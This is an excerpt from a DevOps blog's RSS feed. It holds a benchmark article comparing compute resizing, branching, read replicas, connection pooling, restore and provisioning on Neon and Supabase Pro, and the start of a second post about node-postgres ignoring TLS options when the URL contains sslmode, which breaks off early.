      <description><![CDATA[Two benchmark sessions against Neon and Supabase Pro measured what spec sheets never show: compute resizes cost 39 seconds of real downtime on one platform and zero on the other, read replicas differ by 23x, and branch creation has a tail you should know about.]]></description>
      <pubDate>Thu, 11 Jun 2026 16:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[serverless]]></category><category><![CDATA[benchmarks]]></category><category><![CDATA[sre]]></category>
      <content:encoded><![CDATA[<p>Free tiers are where you evaluate a database. Paid tiers are where you operate one, and operating means the unglamorous verbs: resize the compute because traffic doubled, add a read replica because the dashboard queries are hurting, branch the database for a preview environment, restore because someone ran the wrong migration. Vendor documentation describes these operations. It rarely tells you how long they take, and it almost never tells you what they cost in downtime.</p>
<p>So we measured them. This is part two of our Neon vs Supabase series (<a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">part one covered the free tiers</a>), now on the plans you would actually run production on: Supabase Pro against the equivalent Neon tier. Same methodology as before: both platforms in AWS eu-central-1, timed from a client VM in the same metro, every operation run repeatedly across two separate benchmark sessions on different days, raw samples committed, and everything reproducible from <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">the open source harness</a> with a <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> tracking every session since.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>Compute resize is the starkest difference we have ever measured between two managed databases.</strong> Changing compute size on Supabase took 39 seconds of API time and caused 39 seconds of real SQL downtime per change, measured by probing the database every 250ms. The same operation on Neon: 2.4 seconds to apply, zero failed probes.</li>
<li><strong>You also cannot resize Supabase twice in a row</strong>: the platform throttles consecutive compute changes for minutes (&quot;We are still processing addon changes, please try again in 3 minutes&quot;).</li>
<li><strong>Read replicas are an architecture lesson in two numbers</strong>: 8 seconds on Neon (a new compute attaches to existing shared storage) vs 181 seconds on Supabase (a full database clone), with Supabase also requiring Small compute or larger on the primary.</li>
<li><strong>Branching held its free-tier shape</strong>: a Neon branch arrives carrying the parent&#39;s 100k rows in 1.7s; a Supabase branch arrives schema-only in 6.2-6.7s. Supabase&#39;s API now has a with_data flag, but every attempt returned 406 &quot;Failed to fetch latest physical backup&quot; on a fresh project: data branches have infrastructure prerequisites.</li>
<li><strong>Under connection stampedes the platforms are twins</strong>: 50, 100, and 200 simultaneous cold connections produced near-identical wave times and zero refusals on both.</li>
</ul>
<h2 id="h2-how-we-measured" class="group relative scroll-mt-24">
        <a href="#h2-how-we-measured" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we measured
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-we-measured"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Every number below is the median of repeated runs (10 per operation per session for management operations, 5 waves per concurrency level), collected in two independent sessions on consecutive days. The two sessions agreed within single-digit percentages on every operation, which is the property that makes medians worth publishing. The client sat 1-2ms from both platforms. Resources were created fresh and torn down after every run.</p>
<p>One honest note on plans: the Supabase side ran on Pro ($25/month). The Neon side ran on a Scale-plan account, but every operation measured here (branching, resize, replicas, restore) behaves identically on Launch; plan tier changes quotas and retention windows, not the mechanics we timed.</p>
<h2 id="h2-compute-resize-the-3am-operation" class="group relative scroll-mt-24">
        <a href="#h2-compute-resize-the-3am-operation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Compute resize: the 3am operation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-compute-resize-the-3am-operation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You sized the database for launch traffic. Launch went well. Now you need the next compute size, and the question that matters is not &quot;can the platform do it&quot; but &quot;what happens to my users while it does&quot;.</p>
<p>We resized each platform&#39;s compute up and back down, ten cycles per session, while a probe ran <code>select 1</code> against the database every 250 milliseconds. Two numbers per resize: how long until the management API reported the change applied, and how long SQL actually failed.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Compute resize: API apply time vs actual SQL outage (median)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;10 resize cycles per provider per session, alternating up and down. Outage measured by probing select 1 every 250ms through the change.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, apply&quot;,&quot;value&quot;:2383.9,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Neon, SQL outage&quot;,&quot;value&quot;:0,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, apply&quot;,&quot;value&quot;:39218.3,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, SQL outage&quot;,&quot;value&quot;:38879.7,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>Neon applies an autoscaling-limit change in 2.4 seconds, and across forty resize cycles in two sessions, <strong>the probe never failed once</strong>. The compute reconfigures behind the same endpoint without dropping the connection path. Supabase restarts the database to change compute: 39 seconds of apply time, and effectively all of it is real downtime; their docs say resizes are &quot;usually applied with less than 2 minutes of downtime&quot;, and our measurements land comfortably inside that promise while still being 39 seconds of failed queries per change.</p>
<p>The second finding is subtler and bit us during the benchmark itself: <strong>Supabase refuses back-to-back compute changes</strong>. Issue two resizes in quick succession and the API returns &quot;We are still processing addon changes, please try again in 3 minutes&quot;, and the project reports an unhealthy state between changes. For a production runbook this means a Supabase resize is a planned, serialized event with a maintenance-window mindset. On Neon it is closer to a config tweak.</p>
<p>If your workload&#39;s compute needs change often (and on serverless-adjacent platforms, that is the promise), this section is the comparison.</p>
<h2 id="h2-branching-same-story-sharper-edges" class="group relative scroll-mt-24">
        <a href="#h2-branching-same-story-sharper-edges" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Branching: same story, sharper edges
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-branching-same-story-sharper-edges"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Part one covered free-tier branching; the paid tiers sharpen it. A Neon branch is a copy-on-write reference to the parent&#39;s storage: it arrives carrying all data. A Supabase branch is a freshly provisioned project that replays schema and config: it arrives empty of data, on Pro as on free.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Branch to queryable: Neon copies 100k rows, Supabase copies schema only&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Session 2 runs shown; session 1 medians within 8%. One session-1 Supabase branch took 146 seconds, see the text.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon (with data)&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;samples&quot;:[1712.7,1746.6,1678.7,1659.5,1704.8,1704.2,1701.4,1705.1,1677.6,1690.8]},{&quot;name&quot;:&quot;Supabase (schema only)&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[7213.8,6151.7,10287.8,6207,6842.3,6311.6,5946.2,6147.4,5977.8,5860.3]}]}"></div><p>Medians: 1.7 seconds for a Neon branch with 100,000 rows of parent data, 6.2-6.7 seconds for a Supabase schema-only branch. Both respectable. Two asterisks worth your attention though:</p>
<p><strong>The tail.</strong> In session one, nine Supabase branches took 6-8 seconds and one took <strong>146 seconds</strong>, with nothing different about the request. Session two had no such outlier, which is exactly why we run multiple sessions. If your CI creates a branch per pull request, a 2.5-minute outlier is the kind of thing that makes a developer rerun the pipeline and file a flaky-infra ticket.</p>
<p><strong>The with_data flag.</strong> Supabase&#39;s branch API accepts <code>with_data: true</code>, which on paper would close the data gap. In practice, every attempt on our freshly created projects failed with 406 &quot;Failed to fetch latest physical backup&quot;: data branches require the project to already have physical backups, which fresh projects do not have and which normally arrives with the PITR add-on. For the create-test-destroy loop that makes branching valuable, data-included branches on Supabase have prerequisites that defeat the purpose today.</p>
<h2 id="h2-read-replicas-attach-vs-clone" class="group relative scroll-mt-24">
        <a href="#h2-read-replicas-attach-vs-clone" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Read replicas: attach vs clone
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-read-replicas-attach-vs-clone"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Adding a read replica is where the two architectures stop being abstract diagrams and start being your wait time.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Read replica to first query&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Neon attaches compute to shared storage; Supabase clones the database (Small compute minimum).&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;samples&quot;:[8219.8,8171.9,8018.9,8018,8043.2,8047,7984.8,9149.2]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[183306.8,181922.1,174655.8,181425.2]}]}"></div><p>Neon: 8 seconds median to a replica answering queries. There is nothing to copy; a read-only compute attaches to the same shared storage as the primary, so replica creation is compute provisioning, full stop. It also means no replication lag in the classic sense and no extra storage bill.</p>
<p>Supabase: 181 seconds median, remarkably consistent (our session-one runs landed within a 2-second band of each other), because each replica is a physical clone of the database with WAL streaming, the way RDS would do it. Two operational prerequisites we hit: the primary must run Small compute or larger (the API rejects replicas on Micro with &quot;Read replicas require a minimum size of small&quot;), and replica disk bills at 1.25x the primary&#39;s size.</p>
<p>Neither approach is wrong. Clones isolate replicas from primary storage performance; shared storage makes replicas instant and cheap. But if your scaling playbook says &quot;add a replica when read latency climbs&quot;, one platform executes that play in seconds and the other in minutes, and the minutes version also costs a compute-size bump if you started small.</p>
<h3 id="h3-does-any-of-this-scale-with-database-size" class="group relative scroll-mt-24">
        <a href="#h3-does-any-of-this-scale-with-database-size" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Does any of this scale with database size?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-does-any-of-this-scale-with-database-size"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The attach-vs-clone story makes a testable prediction: copy-on-write operations should stay flat as the database grows, physical clones should not. So we reran branches and replicas at 100k, 1M, and 5M seeded rows, a 50x span.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;line&quot;,&quot;title&quot;:&quot;Read replica creation as the database grows&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;Median time to a replica answering queries at 100k, 1M, and 5M seeded rows.&quot;,&quot;x&quot;:[&quot;100k rows&quot;,&quot;1M rows&quot;,&quot;5M rows&quot;],&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;data&quot;:[7.9,8,8.2]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;data&quot;:[181,181.8,202.7]}]}"></div><p>The prediction holds, with one nuance. Neon branches are flat to the decimal (1.73s, 1.67s, 1.67s) and so are its replicas (7.9s, 8.0s, 8.2s): there is nothing that copies data, so data size cannot matter. Supabase branches are also flat at 6.4s, but for the less flattering reason that they only copy schema. Supabase replicas are the one operation where size shows: the median grew 12% by 5M rows and p95 stretched from 182s to 234s. At a few hundred megabytes, provisioning still dominates the clone; at real production sizes, the copy takes over and that line keeps climbing. Our benchmark budget stops at 5M rows, but the direction is unambiguous, and it compounds the playbook problem above: the moment you most need a replica is the moment your database is biggest.</p>
<h2 id="h2-the-connection-stampede-a-tie-worth-publishing" class="group relative scroll-mt-24">
        <a href="#h2-the-connection-stampede-a-tie-worth-publishing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The connection stampede: a tie worth publishing
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-connection-stampede-a-tie-worth-publishing"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Serverless platforms fail in bursts: two hundred function invocations wake at once and all of them want a connection. We simulated exactly that through each platform&#39;s transaction pooler: N simultaneous cold connections, each performing connect, TLS, auth, one query, disconnect.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Connection stampede: N simultaneous cold connections through the pooler (median wave)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;5 waves per level per provider. Zero refused connections at any level on either platform.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, 50 clients&quot;,&quot;value&quot;:313,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 50 clients&quot;,&quot;value&quot;:308,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Neon, 100 clients&quot;,&quot;value&quot;:610,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 100 clients&quot;,&quot;value&quot;:522,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Neon, 200 clients&quot;,&quot;value&quot;:1109,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 200 clients&quot;,&quot;value&quot;:1058,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>Both platforms absorb a 200-connection stampede in about a second, scaling near-linearly from 50 to 200 clients, with <strong>zero refused connections at any level on either platform</strong>. Supabase&#39;s Supavisor was a hair faster at every level; the margin is noise. After the resize and replica sections, it would be easy to expect Neon to win everything; this is the result that says the comparison is about architecture, not quality. Both teams have built excellent poolers.</p>
<h2 id="h2-restore-the-operation-you-hope-never-to-time" class="group relative scroll-mt-24">
        <a href="#h2-restore-the-operation-you-hope-never-to-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Restore: the operation you hope never to time
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-restore-the-operation-you-hope-never-to-time"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>We restored Neon branches to a point 60 seconds in the past, with 100k rows of data, eight runs per session: <strong>5.6 to 6.9 seconds median</strong> until the management API confirmed completion and SQL answered on the restored state. That is point-in-time recovery at interactive speed, and it comes included.</p>
<p>On Supabase, point-in-time recovery is a $100/month add-on (per 7-day retention window, Small compute minimum), so we documented it rather than benchmarked it; daily backups are included on Pro but a daily backup is a very different promise from PITR when the bad migration ran at 14:47. If sub-minute-granularity recovery matters to your operation, price the add-on into the comparison.</p>
<h2 id="h2-the-finding-we-didnt-go-looking-for" class="group relative scroll-mt-24">
        <a href="#h2-the-finding-we-didnt-go-looking-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The finding we didn't go looking for
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-finding-we-didnt-go-looking-for"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>While rechecking our own dashboard we noticed something odd: project creation on the Supabase Pro org was wildly slower than the free-org numbers from part one. So we measured it properly, twice, a day apart.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Supabase project creation to first query, free org vs Pro org&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;Same region, same API, same harness. The only variable is the organization's plan.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Free org&quot;,&quot;color&quot;:&quot;#34d399&quot;,&quot;samples&quot;:[7.6,11.9,7.1,6.5,8.5,7.4,6.9,8.1,9.2,9.9,6.8,6.9,7.5,7.9,6.8,6.9,7.1,7.3,11.8,8.4]},{&quot;name&quot;:&quot;Pro org, day one&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[148.4,140.9,152.1,137.9,112.9,112,113.4,114.8,153.5,169.9,158,110.5,145.8,110.3,109.8,125.2,163.5,107.3,152.1,107.6]},{&quot;name&quot;:&quot;Pro org, day two&quot;,&quot;color&quot;:&quot;#818cf8&quot;,&quot;samples&quot;:[137.7,110.3,110.9,108.5,134.2,142.4,111.9,113.8]}]}"></div><p>Free org: <strong>7.4 seconds median</strong> to a queryable project. Pro org: <strong>125.2 seconds</strong> on day one (20 runs) and <strong>111.9 seconds</strong> on day two (10 runs), so this is not a one-day capacity blip. Day two also produced two provisioning failures we did not cause: one project came up with no pooler configuration, and another returned 404 on its own ref immediately after creation. Neon, measured the same morning as a control, created projects in 5.5 seconds with no failures.</p>
<p>We do not know why paid-org provisioning is 15x slower than free; nothing in the documentation suggests it should be. If your platform automation creates Supabase projects programmatically (per-tenant databases, ephemeral environments), budget two minutes and a retry loop, not eight seconds. We have raw samples committed for all three sessions and would genuinely welcome an explanation.</p>
<h2 id="h2-what-failed-and-what-it-taught-us" class="group relative scroll-mt-24">
        <a href="#h2-what-failed-and-what-it-taught-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What failed, and what it taught us
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-failed-and-what-it-taught-us"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A benchmark that reports only clean numbers is hiding something. Ours hit three walls worth knowing about:</p>
<ul>
<li>Supabase&#39;s addon pipeline throttling (above) means resize benchmarks, and resize automation, must wait minutes between changes.</li>
<li>Supabase Management API mutations sometimes return empty response bodies, and replica setup reports no status; readiness means polling the pooler config until a READ_REPLICA entry appears. Automation against these APIs needs more defensive plumbing than Neon&#39;s operations API, which returns explicit operation objects with terminal states.</li>
<li>A long-running idle Postgres connection on either platform will emit asynchronous errors when the server restarts under it (compute resize, for instance). If your Node service holds connections through a Supabase resize, handle the <code>error</code> event on your clients or the restart will take your process down with it. Ask us how we know.</li>
<li>One more finding was waiting after the benchmarks ended. With every benchmark project torn down and the organization verifiably empty (<code>GET /v1/projects</code> and the org-scoped listing both return zero projects), downgrading the org from Pro was refused with &quot;You still have active preview branches. Please delete all your preview branches and disable branching feature before downgrading to Free Plan.&quot; No projects exist, so no branches can: the downgrade validator appears to count orphaned branch records left behind when branches&#39; parent projects are deleted. If you run branch-heavy ephemeral workloads on a paid org and ever plan to downgrade it, know that the exit door can be blocked by data you can no longer see or delete. Supabase support sorted it out: their team confirmed five orphaned branch projects stuck in a restoring state, each returning 403 to both reads and deletes through the public API, so only their infra team could remove them. Once they did, the downgrade went straight through. The root cause matched our guess (a branch still provisioning when its parent project was deleted), support was responsive throughout, and they said they are hardening the flow so it cannot happen again. Worth knowing this is an edge case you only reach by creating and destroying branches fast in automation, not something a normal project hits.</li>
</ul>
<h2 id="h2-verdict" class="group relative scroll-mt-24">
        <a href="#h2-verdict" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Verdict
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-verdict"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The free-tier conclusion was &quot;pick on shape, not speed&quot;. The production-tier conclusion is sharper: <strong>the operational gap is real, and it favors Neon almost everywhere it exists</strong>. Resize without downtime vs a 39-second outage with a minutes-long cooldown; replicas in 8 seconds vs 3 minutes with compute prerequisites; branches with data vs without; included interactive PITR vs a $100/month add-on. The one place the platforms tie (connection stampedes) is the one place most teams assumed serverless Postgres would struggle, and neither does.</p>
<p>What this verdict does not say: Supabase Pro still bundles auth, storage, realtime, and edge functions that Neon does not have today (announced, not shipped), and part one&#39;s conclusion stands: teams shipping a v1 product buy real velocity with that bundle. But if the database is the load-bearing component of your operation and you expect to resize, replicate, branch, and occasionally restore it, the operational benchmarks have a clear winner.</p>
<p>Every number above links to raw committed samples, the <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> updates with every benchmark session, and the <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">harness is open source</a>: if you see something off in the methodology or get different numbers, open an issue or a pull request, corrections are welcome and credited. For the architectural side by side rather than the timings, our <a href="https://devops-daily.com/comparisons/neon-vs-supabase">full Neon vs Supabase comparison</a> covers pricing models, PITR, and the bundled features in one place. Part three prices all of this against a growing application, including the cost crossover points nobody talks about.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[node-postgres Silently Ignores Your TLS Config When the URL Says sslmode]]></title>
      <link>https://devops-daily.com/posts/node-postgres-sslmode-silently-ignores-ssl-options</link>
      <description><![CDATA[If your connection string contains sslmode=require, the pg library throws away the ssl options object where you loaded your CA certificate, and verification fails with "self-signed certificate in certificate chain". Here is the trap, the fix, and the v9 changes coming.]]></description>
      <pubDate>Wed, 10 Jun 2026 20:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/node-postgres-sslmode-silently-ignores-ssl-options</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[nodejs]]></category><category><![CDATA[tls]]></category><category><![CDATA[supabase]]></category><category><![CDATA[debugging]]></category><category><![CDATA[databases]]></category>
      <content:encoded><![CDATA[<p>While building a <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">benchmark harness for Neon and Supabase</a>, we lost an hour to a TLS failure that made no sense. The CA certificate was correct. The chain verified fine with <code>openssl</code>. A raw Node <code>tls.connect</code> with the same CA returned <code>authorized: true</code>. And node-postgres still failed every connection with:</p>
<pre><code>Error: self-signed certificate in certificate chain
</code></pre><p>The cause turned out to be a behavior of <code>pg</code> (node-postgres) that is easy to hit and hard to suspect: <strong>when your connection string contains an <code>sslmode</code> parameter, the <code>ssl</code> options object you pass to the client is silently ignored.</strong> Your carefully loaded CA file never reaches the TLS socket.</p>
<h2 id="h2-the-trap-reproduced" class="group relative scroll-mt-24">
        <a href="#h2-the-trap-reproduced" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The trap, reproduced
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-trap-reproduced"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
